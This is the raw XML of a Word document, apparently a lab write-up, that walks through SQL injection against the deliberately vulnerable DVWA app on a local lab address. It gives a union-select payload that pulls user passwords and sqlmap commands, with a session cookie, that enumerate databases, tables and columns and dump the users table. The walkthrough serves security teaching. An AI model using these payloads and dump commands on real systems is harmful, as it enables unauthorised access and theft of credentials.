        <w:t xml:space="preserve">Step8- to find the column data and password use </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=2 union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>user,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> from users#</w:t>
      </w:r>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">” this code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944565F" w14:textId="5CB31061" w:rsidR="006B5B67" w:rsidRPr="00D674E3" w:rsidRDefault="006B5B67" w:rsidP="006606FE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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2212CA4F" wp14:editId="79B6F53C">
            <wp:extent cx="5943600" cy="5107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52EC" w14:textId="331C54ED" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C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We have got passwords from the table users. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212098F6" w14:textId="2B164B19" w:rsidR="006B5B67" w:rsidRPr="00D674E3" w:rsidRDefault="006B5B6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14BBAB4" w14:textId="21463CD8" w:rsidR="00D657C7" w:rsidRPr="00D674E3" w:rsidRDefault="00D657C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93AAC61" w14:textId="0AF3FDBA" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C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D597F0B" w14:textId="7D6BA4DB" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C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5A059ED" w14:textId="13A69006" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C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D587CAF" w14:textId="36B409E9" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C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A785595" w14:textId="755BB699" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="0070213A" w:rsidP="0070213A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7092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 xml:space="preserve">SQLMAP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5763C4CE" w14:textId="5A78F634" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C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Step1- open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spell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and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spell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and turn on intercept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586513D8" w14:textId="785F0F5B" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C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Step2- after opening </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spell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injection tab copy the http URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD015A" w14:textId="65E11D9C" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="008D65FB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73600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="538CE520" wp14:editId="0839E9E1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>588010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="37242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C9C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Step3- inside the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F62C9C" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, copy the cookie security</w:t>
      </w:r>
      <w:r w:rsidR="006A1F97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ID.</w:t>
      </w:r>
      <w:r w:rsidR="00F62C9C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14:paraId="33ED134D" w14:textId="0F7DD7AD" w:rsidR="00F62C9C" w:rsidRPr="00D674E3" w:rsidRDefault="00F62C9C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A445A47" w14:textId="745E6F4F" w:rsidR="005C008E" w:rsidRPr="00D674E3" w:rsidRDefault="005C008E" w:rsidP="006606FE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9D46477" w14:textId="4086F175" w:rsidR="006A1F97" w:rsidRPr="00D674E3" w:rsidRDefault="005C008E" w:rsidP="008D65FB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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="626A7827" wp14:editId="6FEBB4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339975"/>
            <wp:effectExtent l="0" t="0" r="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E4D62" w14:textId="286CD7C7" w:rsidR="006A1F97" w:rsidRPr="00D674E3" w:rsidRDefault="006A1F97" w:rsidP="006A1F97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>Step4- open the terminal and use this command to check database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7C2DC1" w14:textId="67C906B9" w:rsidR="006A1F97" w:rsidRPr="00D674E3" w:rsidRDefault="006A1F97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>Command</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-  Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="gram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-u 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“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>http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit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”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–cookie=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”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Cookie: security=low; PHPSESSID=gkdspvphje4kbafne8m1n59d85; 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“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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18A124BA" w14:textId="77777777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514A040" w14:textId="77777777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F96A249" w14:textId="77777777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E67986B" w14:textId="77777777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B66DB49" w14:textId="359CA6CB" w:rsidR="005C008E" w:rsidRPr="00D674E3" w:rsidRDefault="005C008E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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5AD3A917" wp14:editId="1C7D89BA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-678815</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5254625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7148195" cy="29718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8195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59264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55D0A3C6" wp14:editId="6E7E529F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-793115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7430135" cy="5045075"/>
            <wp:effectExtent l="0" t="0" r="0" b="31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135" cy="504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606FE" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>OUTPUT-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E350FD" w14:textId="77777777" w:rsidR="006A1F97" w:rsidRPr="00D674E3" w:rsidRDefault="006A1F97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>Step 5- use this command to find the tables from the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B61A091" w14:textId="12F99588" w:rsidR="006A1F97" w:rsidRPr="00D674E3" w:rsidRDefault="0032635C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61312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78EFC198" wp14:editId="319262C0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>76200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1036320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3368040"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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1F97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Command- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1F97" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1F97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-u 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>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00D674E3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit” –cookie=</w:t>
        </w:r>
      </w:hyperlink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“</w:t>
      </w:r>
      <w:r w:rsidR="006A1F97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Cookie: security=low; PHPSESSID=gkdspvphje4kbafne8m1n59d85; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006A1F97" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>“ –</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006A1F97" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>D dvwa --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9315C" w14:textId="34A545B0" w:rsidR="005C008E" w:rsidRPr="00D674E3" w:rsidRDefault="0032635C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75648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3617E906" wp14:editId="2356CDF3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>220980</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3670935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2509520"/>
            <wp:effectExtent l="0" t="0" r="0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6FE" w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>OUTPUT-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2311BFEC" w14:textId="42759A17" w:rsidR="005C008E" w:rsidRPr="00D674E3" w:rsidRDefault="005C008E" w:rsidP="006606FE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CD4837D" w14:textId="16CF41D2" w:rsidR="005C008E" w:rsidRPr="00D674E3" w:rsidRDefault="006A1F97" w:rsidP="002E4FB3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We have found 2 tables here, Guestbook and users. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B1457" w14:textId="50E63FEA" w:rsidR="006A1F97" w:rsidRPr="00D674E3" w:rsidRDefault="006A1F97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Step6- use command – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1922D1BA" w14:textId="6FA52041" w:rsidR="005C008E" w:rsidRPr="00D674E3" w:rsidRDefault="006A1F97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Sqlmap -u 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“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>http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit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”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–cookie=”Cookie: security=low; PHPSESSID=gkdspvphje4kbafne8m1n59d85; “ D dvwa –T users –columns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB73897" w14:textId="71364222" w:rsidR="006A1F97" w:rsidRPr="00D674E3" w:rsidRDefault="006A1F97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To find the columns from the selected table. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D614C6" w14:textId="6CE7E56A" w:rsidR="005C008E" w:rsidRPr="00D674E3" w:rsidRDefault="005C008E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7590C85" w14:textId="678FB126" w:rsidR="005C008E" w:rsidRPr="00D674E3" w:rsidRDefault="004739B5" w:rsidP="006606FE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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E8BFB6A" wp14:editId="2750EB9F">
            <wp:extent cx="5943600" cy="37712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8F23" w14:textId="2C2EDF28" w:rsidR="005C008E" w:rsidRPr="00D674E3" w:rsidRDefault="005C008E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D33D1A2" w14:textId="67FDEDFE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3A027AE" w14:textId="021F021A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7AA04249" w14:textId="711BD61E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3F22785" w14:textId="0BE30571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16A27C7" w14:textId="77777777" w:rsidR="0032635C" w:rsidRPr="00D674E3" w:rsidRDefault="0032635C" w:rsidP="0032635C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38848FF" w14:textId="2CD34E28" w:rsidR="006A1F97" w:rsidRPr="00D674E3" w:rsidRDefault="006A1F97" w:rsidP="0032635C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Step6- OUTPUT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A6A1BF" w14:textId="53B6FC45" w:rsidR="006A1F97" w:rsidRPr="00D674E3" w:rsidRDefault="006A1F97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We have found first_name, last_name, password, user_id columns from the table users. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768EDC51" w14:textId="77777777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6D68807" w14:textId="1EC9ADEF" w:rsidR="004739B5" w:rsidRPr="00D674E3" w:rsidRDefault="004739B5" w:rsidP="006606FE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7092"/>
        </w:tabs>
        <w:ind w:left="360"/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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E00135" wp14:editId="0193D11B">
            <wp:extent cx="5943600" cy="4484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4F6F" w14:textId="77777777" w:rsidR="001945E0" w:rsidRPr="00D674E3" w:rsidRDefault="001945E0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5CD9264" w14:textId="55B77B02" w:rsidR="001945E0" w:rsidRPr="00D674E3" w:rsidRDefault="001945E0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7AF6DD94" w14:textId="6B9F7F82" w:rsidR="006606FE" w:rsidRPr="00D674E3" w:rsidRDefault="006606FE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0EB8B18" w14:textId="47441513" w:rsidR="006606FE" w:rsidRPr="00D674E3" w:rsidRDefault="006606FE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9E94F53" w14:textId="2694D954" w:rsidR="006606FE" w:rsidRPr="00D674E3" w:rsidRDefault="006606FE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6DF7E84" w14:textId="47053777" w:rsidR="006606FE" w:rsidRPr="00D674E3" w:rsidRDefault="006606FE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72613A3" w14:textId="77777777" w:rsidR="006606FE" w:rsidRPr="00D674E3" w:rsidRDefault="006606FE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Step7- use command- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D9BD6" w14:textId="72F5E442" w:rsidR="006606FE" w:rsidRPr="00D674E3" w:rsidRDefault="006606FE" w:rsidP="0032635C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 w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spell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-u 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“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>http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit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”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–cookie=”Cookie: security=low; PHPSESSID=gkdspvphje4kbafne8m1n59d85; “ D dvwa –T users –C </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>user,password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>,first_name, last_name –dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FEE411" w14:textId="509AC78B" w:rsidR="006606FE" w:rsidRPr="00D674E3" w:rsidRDefault="006606FE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>To check the values from the users table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A227B59" w14:textId="1BF90994" w:rsidR="004739B5" w:rsidRPr="00D674E3" w:rsidRDefault="001945E0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62336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39BECF0D" wp14:editId="5314DCB0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-624840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7277735" cy="442023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735" cy="442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33CDD0" w14:textId="77777777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7B48675D" w14:textId="77777777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8C476D7" w14:textId="77777777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2A58611" w14:textId="5CE603E6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7F3077AD" w14:textId="6C915D0F" w:rsidR="006606FE" w:rsidRPr="00D674E3" w:rsidRDefault="006606FE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>Step 7 OUTPUT- we have found the data(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password) of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gramStart"/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users</w:t>
      </w:r>
      <w:proofErr w:type="gram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table. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF1214C" w14:textId="1102E376" w:rsidR="001945E0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63360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17DFF2F7" wp14:editId="782DD2F4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-678180</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7262495" cy="571563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495" cy="571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CF36B" w14:textId="557329A2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E111CEB" w14:textId="318F40E2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FB8EBF3" w14:textId="5440BEEA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2E8F797" w14:textId="4E6F3ADD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08B614B" w14:textId="77777777" w:rsidR="00E45E98" w:rsidRPr="00D674E3" w:rsidRDefault="00E45E98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050C8DE" w14:textId="59D0E9DC" w:rsidR="00E45E98" w:rsidRPr="00D674E3" w:rsidRDefault="0032635C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Here we have found data of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>user ,</w:t>
      </w:r>
      <w:proofErr w:type="gram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avatar, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D674E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5031142A" w14:textId="703BD1FF" w:rsidR="00E45E98" w:rsidRPr="00D674E3" w:rsidRDefault="00E45E98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65408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F601BA3" wp14:editId="2CD15F37">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-220980</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="33147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D1632" w14:textId="19166E66" w:rsidR="00E45E98" w:rsidRPr="00D674E3" w:rsidRDefault="00E45E98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67456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C9607E3" wp14:editId="37CB1E7D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-213360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>266065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3178810"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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2166A" w14:textId="065D83F2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C9B88EB" w14:textId="3C406067" w:rsidR="00E45E98" w:rsidRPr="00D674E3" w:rsidRDefault="00E45E98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sectPr w:rsidR="00E45E98" w:rsidRPr="00D67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830C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BC488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91A"/>
    <w:rsid w:val="00014B3E"/>
    <w:rsid w:val="000D0F3F"/>
    <w:rsid w:val="001167D2"/>
    <w:rsid w:val="001945E0"/>
    <w:rsid w:val="002E4FB3"/>
    <w:rsid w:val="0032635C"/>
    <w:rsid w:val="004739B5"/>
    <w:rsid w:val="005111A8"/>
    <w:rsid w:val="005C008E"/>
    <w:rsid w:val="006606FE"/>
    <w:rsid w:val="00671065"/>
    <w:rsid w:val="006A1F97"/>
    <w:rsid w:val="006B5B67"/>
    <w:rsid w:val="0070213A"/>
    <w:rsid w:val="00703599"/>
    <w:rsid w:val="00714D41"/>
    <w:rsid w:val="00780051"/>
    <w:rsid w:val="00865AC2"/>
    <w:rsid w:val="008D65FB"/>
    <w:rsid w:val="00B733FD"/>
    <w:rsid w:val="00C5191A"/>
    <w:rsid w:val="00D10246"/>
    <w:rsid w:val="00D14C96"/>
    <w:rsid w:val="00D657C7"/>
    <w:rsid w:val="00D674E3"/>
    <w:rsid w:val="00E45E98"/>
    <w:rsid w:val="00EF572C"/>
    <w:rsid w:val="00F62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A97F2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E2FDBC30-7C01-4316-A01E-A05B90B97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57C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657C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4C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4C96"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006606F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263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192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit&#8221;%20&#8211;cookie=" TargetMode="External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Gupta</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rahul Gupta</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-14T05:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-14T05:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>